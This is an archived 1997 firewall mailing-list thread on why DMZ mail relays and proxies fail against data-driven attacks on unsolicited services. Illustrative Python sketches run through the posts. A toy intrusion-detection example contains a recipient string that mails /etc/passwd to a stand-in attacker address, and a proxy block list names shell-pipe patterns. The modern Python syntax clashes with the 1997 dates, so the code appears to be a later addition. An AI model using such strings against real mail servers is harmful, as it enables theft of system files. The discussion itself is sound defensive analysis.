Firewall Wizards mailing list archives

RE: firewalls and the incoming traffic problem


From: Dominique Brezinski <dominique.brezinski () cybersafe com>
Date: Tue, 30 Sep 1997 12:15:29 -0700

Hello all,
        I just joined this list, so I have read only today's messages in this
thread. There are a few messages with content I would like to comment on, but
I will start here since there is a copy of MJR's post at the bottom.

        I tend to be interested in IDS and incident forensics, but I have had to
think about firewall topologies and technologies for practical reasons in
the past. I agree with MJR that unsolicited services are a big issue -
an issue so large that I believe all current perimeter security
technologies I know of are insufficient protection. I will use SMTP and
the topology Dana Nowell describes as my example.

        The problem with using relay hosts in the DMZ for unsolicited services is
that they are, by definition, a nexus between the trusted network inside
and the untrusted public network. The relay host MUST be able to
communicate with its internal peer, either directly at the network layer
(through some sort of filter) or through an application proxy, because these
are unsolicited services pushing information into the trusted network. With
SMTP set up in this kind of configuration, one will
generally have a DMZ mailhub, a filter or proxy, and then the internal
mailhub. As MJR noted, the DMZ mailhub will have to accept SMTP from just
about everywhere, but the proxy/filter and internal mailhub can be limited
to a finite scope. The problem is that SMTP is attacked through data-driven
exploits (think MIME conversions in Sendmail 8.8.X), and it is therefore
usually easy to propagate the exploit through this chain.
To compound matters, most sites use the same SMTP handler on the DMZ mailhub
as they do on the internal mailhub, and thus the same attack that works on
the DMZ hub works on the internal hub. By transitivity, since the world can
communicate with the DMZ hub and the DMZ hub can communicate with the
internal hub, the world can effectively communicate with the internal hub.
The fact that it is two hops instead of
one really does not make too much difference against a dedicated attacker,
though it might thwart a script kiddie. We now must rely on the
configuration and security of the SMTP handler(s) and host(s) on the
inside, which is the point I believe MJR is making.
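
To make that concrete, here is a minimal sketch (Python, with hypothetical
host names) of why the relay chain does not stop a data-driven attack: the
attacker only ever speaks to the DMZ hub, but the DMZ hub's whole job is to
re-send essentially the same bytes to the internal hub.

import smtplib

# A message whose headers/body are crafted to trigger a parsing bug in the
# receiving mailer (the Sendmail 8.8.x MIME-conversion style of problem).
# The actual exploit content is irrelevant here; what matters is that a
# relay forwards it essentially unmodified.
payload = (
    "From: anyone@example.org\r\n"
    "To: victim@internal.example.com\r\n"
    "MIME-Version: 1.0\r\n"
    "Content-Type: multipart/mixed; boundary=\"(imagine something malformed)\"\r\n"
    "\r\n"
    "body\r\n"
)

# The attacker can reach only the DMZ mailhub...
dmz = smtplib.SMTP("dmz-mailhub.example.com")
dmz.sendmail("anyone@example.org", ["victim@internal.example.com"], payload)
dmz.quit()
# ...but the DMZ hub relays the message inward over the port-25 path the
# firewall has to leave open, so the same data reaches the internal hub.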

        I have seen this technique used with NNTP in the not too distant past, and
it is generally the way firewalls are penetrated. I have personally started
looking back at other methods of providing better security. Like
MJR, I don't believe firewalls are dead, I just view them as one piece of
perimeter defense.

        Several people mentioned AI and IDS techniques coming into play, which I
believe they will, but in a different manner than they have historically.
Most, if not all, IDS systems attempt to isolate and recognize specific
exploits through expert analysis, pattern matching, and other AI techniques.
This leads to several problems: as the set of vulnerabilities and exploits
grows, the analysis workload increases; the set of known exploits will
always be smaller than the set of exploits currently in use; this method
does not work well for data attacks against custom applications; and the
ability to respond to an attack is often limited. For ID techniques to work
well in a living, breathing network, I believe we will see intrusion
detection spread throughout the network, with the firewall being one of
many points of input. Just as firewall policy should be that whatever is
not explicitly accepted is denied, IDS should learn from that model.
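
As a toy contrast (Python, with made-up patterns and recipients - not any
real IDS), compare matching known exploit signatures against flagging
anything that is not explicitly part of accepted use:

# Signature matching: catches only what has already been analysed and encoded.
KNOWN_EXPLOITS = ["/bin/sh", "c:\\autoexec.bat"]

def signature_match(rcpt):
    return any(sig in rcpt for sig in KNOWN_EXPLOITS)

# Default-deny: anything outside normal, accepted use is flagged,
# including attacks nobody has written a signature for yet.
ACCEPTED_RECIPIENTS = {"jsmith", "sales", "postmaster"}

def default_deny(rcpt):
    return rcpt not in ACCEPTED_RECIPIENTS

event = "|/usr/ucb/mail attacker@example.org < /etc/passwd"
print(signature_match(event))   # False - no known signature matches
print(default_deny(event))      # True  - not an accepted recipient, so flag it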

        More later...

Dominique Brezinski

At 11:58 AM 9/29/97 -0400, Dana Nowell wrote:
OK, maybe I missed something but ...

If I build an entryway that has a DMZ and I populate the DMZ with service
handlers that accept and fulfill the external requests, don't I mitigate the
problem?

For example, I put a mail gateway in the DMZ.  All internal mail is sent to
the internal mail hub, which knows about all the internal users and forwards
all external mail out to the external mail gateway.  The external gateway
takes all mail it receives and delivers it (assume anti-spam propagation
filters).  External mail from the internal mail hub is sent over the
Internet; Internet mail is resolved via aliases on the mail gateway to be
forwarded to the internal mail hub (if necessary).  I can handle all
addressing trouble in the external mail gateway (proxy), as no mail passes
inward unless an alias is present in the aliases file (this discussion
assumes sendmail, as it seems to be the common denominator; any mailer
supporting an alias mechanism can be used). The obvious problem is
maintaining the aliases file and the current patch level of the gateway.  A
possible bottleneck issue exists and can be solved via multiple gateways in
parallel.
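
Roughly, the gating logic on the gateway is this (sketched in Python purely
for illustration; with sendmail it is just the aliases lookup, and the
entries below are hypothetical):

# Inbound mail is forwarded to the internal hub only if the recipient's
# local part has an alias; everything else dies at the gateway.
ALIASES = {
    "jsmith": "jsmith@mailhub.internal.example.com",
    "sales":  "sales@mailhub.internal.example.com",
}

def route_inbound(local_part):
    target = ALIASES.get(local_part)
    if target is None:
        return None      # no alias: bounce/drop at the DMZ gateway
    return target        # known alias: relay to the internal hub only

print(route_inbound("jsmith"))     # forwarded inward
print(route_inbound("anything"))   # None - never crosses the firewall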

The same paradigm exists for www servers, say an external server that is
refreshed periodically from an internal server via FTP.  Same for ftp
servers, and most other services.  The main issue is setting up the
internal-to-external mirroring.  Now all 'unsolicited' services supported at
the corporate/division/non-individual level are handled in the DMZ on
sacrificial hosts mirroring data from internal hosts. A breach nets you
access to an untrusted host in the DMZ, the same access you had before from
the attacking host (discounting use as a jump point to attack other nets).
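
The mirror push might look something like this (Python's ftplib, with
hypothetical host, account, and file names - the point is just that the
internal side initiates the transfer and the DMZ host never reaches inward):

from ftplib import FTP

def push_site(files):
    # Connect from the internal server out to the sacrificial www host.
    ftp = FTP("www-dmz.example.com")
    ftp.login("mirror", "mirror-password")      # restricted upload-only account
    for name in files:
        with open(name, "rb") as f:
            ftp.storbinary("STOR " + name, f)   # overwrite yesterday's copy
    ftp.quit()

push_site(["index.html", "products.html"])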

Now for solicited access you have one or more firewalls bridging the
internal net to the DMZ (use a different firewall to handle the mirror
traffic and point all hosts in the DMZ to that more specific firewall for
any internal traffic).

Now, unsolicited traffic always terminates in the DMZ at a sacrificial
host; you break it, you get squat.  The possible exception is the email
host, which should only accept mail destined for external addresses or for
a known alias, minimizing exposure.  If the email host is compromised, it
ONLY has access to the internal hub on port 25 (enforced via firewall
proxy/filter).  This implies a two-phase break-in is required: first the
sacrificial mail host, then the internal hub - hopefully the admin will
notice :).

Add more unsolicited services, add more sacrificial hosts in the DMZ.
An issue arises if you need access to internal data in real time - never a
good idea, but sometimes required by management.  If yesterday's data is OK,
replicate it to the DMZ host.

So unless real-time access is needed, why is this increase in external
services a problem (other than admin and automated tool building)?

So Marcus, what did I miss??




On Sun, 28 Sep 1997 11:32:19 +0000 Marcus J. Ranum expounded:

I'm concerned that firewall technologies are going to
reach an impasse in the next couple of years over what
I am calling the "incoming traffic problem."  Briefly, the
problem:
     - Firewalls are good at providing access control
     on return traffic that is in response to a request
     that originated behind the firewall
     - Firewalls are poor at providing access control
     on "unsolicited" incoming traffic to generic
     services that are "required" as part of being on
     the Internet
     - The number of generic services is increasing
     slowly
     - The number of implementations of the generic
     services is increasing dramatically

Let's take Email as the perfect example. If I have a mail
server behind a firewall, and I want to receive Email,
I have to allow it in to my mail server somehow. More
importantly, for Email to work the way we want it to, I
have to allow Email from virtually any site in to that
mail server. Therefore, the firewall's protection is reduced
as regards my Email service. (I'll come back to the proxy/nonproxy
issue later.) So, we're back to worrying about
sendmail - or are we? Nowadays there are zillions of
implementations of SMTP, on many different O/S platforms,
and it's likely that there are security holes (of one sort or
another) in many of them.

The proxy/nonproxy discussion is becoming increasingly
irrelevant, as a result. Let's assume I'm using some kind
of turbo-whomping stateful filter -- in that case I need to
worry A Whole Lot about the implementation of my Email
service. If I'm allowing the whole world to reach port
25 on my mail server, then the whole world can probe
it for bugs, and, if I'm running a buggy mailer, I have a
real problem. If I'm using a proxy firewall, the proxy
may perform some additional checks, and may block
some well-known attacks, but the problem is still there.
What if I have a proxy firewall built by a UNIX guru,
which knows about mail to: /bin/sh, but which doesn't
know about mail to: c:\autoexec.bat? Those are the
easy cases -- what about the bug in bubbmail1.2 for
Windows NT, where if you send mail addressed to
to: <admincommand: reboot> it will reboot the
machine? A little feature that crept in there...
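
The same point in a few lines of code (Python, with invented patterns - no
real mailer or proxy is meant): a proxy's checks are only as good as the
attacks its author imagined.

# A mail proxy written by a UNIX guru: it blocks the attacks he knew about
# and happily passes everything else.
BLOCKED = ["/bin/sh", "|/usr/bin/"]

def proxy_allows(rcpt_to):
    return not any(bad in rcpt_to for bad in BLOCKED)

print(proxy_allows("</bin/sh>"))               # False: known attack, blocked
print(proxy_allows("<c:\\autoexec.bat>"))      # True:  never occurred to him
print(proxy_allows("<admincommand: reboot>"))  # True:  the vendor's "feature"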

Summary: firewalls originally offered the promise that
you could "install a firewall and not worry about your
internal security."  Now, it's clear that firewalls force
you to split your security between the firewall and host
security on all the systems to which the firewall permits
incoming  traffic.

If I'm going to have to worry about the host security
and the server side s/w on my internal systems, why
shouldn't I just use a router with gross-level filtering
to channel traffic into a few carefully configured
backend servers? The "hard part" is doing the backend
configuration anyhow!!

What's worrying me is all the folks I've seen who put
a firewall in, and believe it is going to somehow protect
the incoming traffic. :( I had a consulting gig where
the customer had a very high profile target website
behind a bunch of proxy firewalls - and for performance
the firewalls were just using plugboard proxies to copy
the data back and forth. AND the web server was a
version of NCSA with known holes. Even if they had had
a proxy server, the proxy server, if it was provided by a
vendor, would not have been able to "know" about
security holes in their locally-developed CGI scripts.
It keeps coming back to having carefully configured
backend servers -- which is expensive and requires
constant maintenance.

I'm not saying that "firewalls are dead" because this
problem has always been there and firewalls DO serve
a purpose. The fact is that sites with firewalls get broken
into less often than sites without. But - are a majority
of firewall users falsely confident?


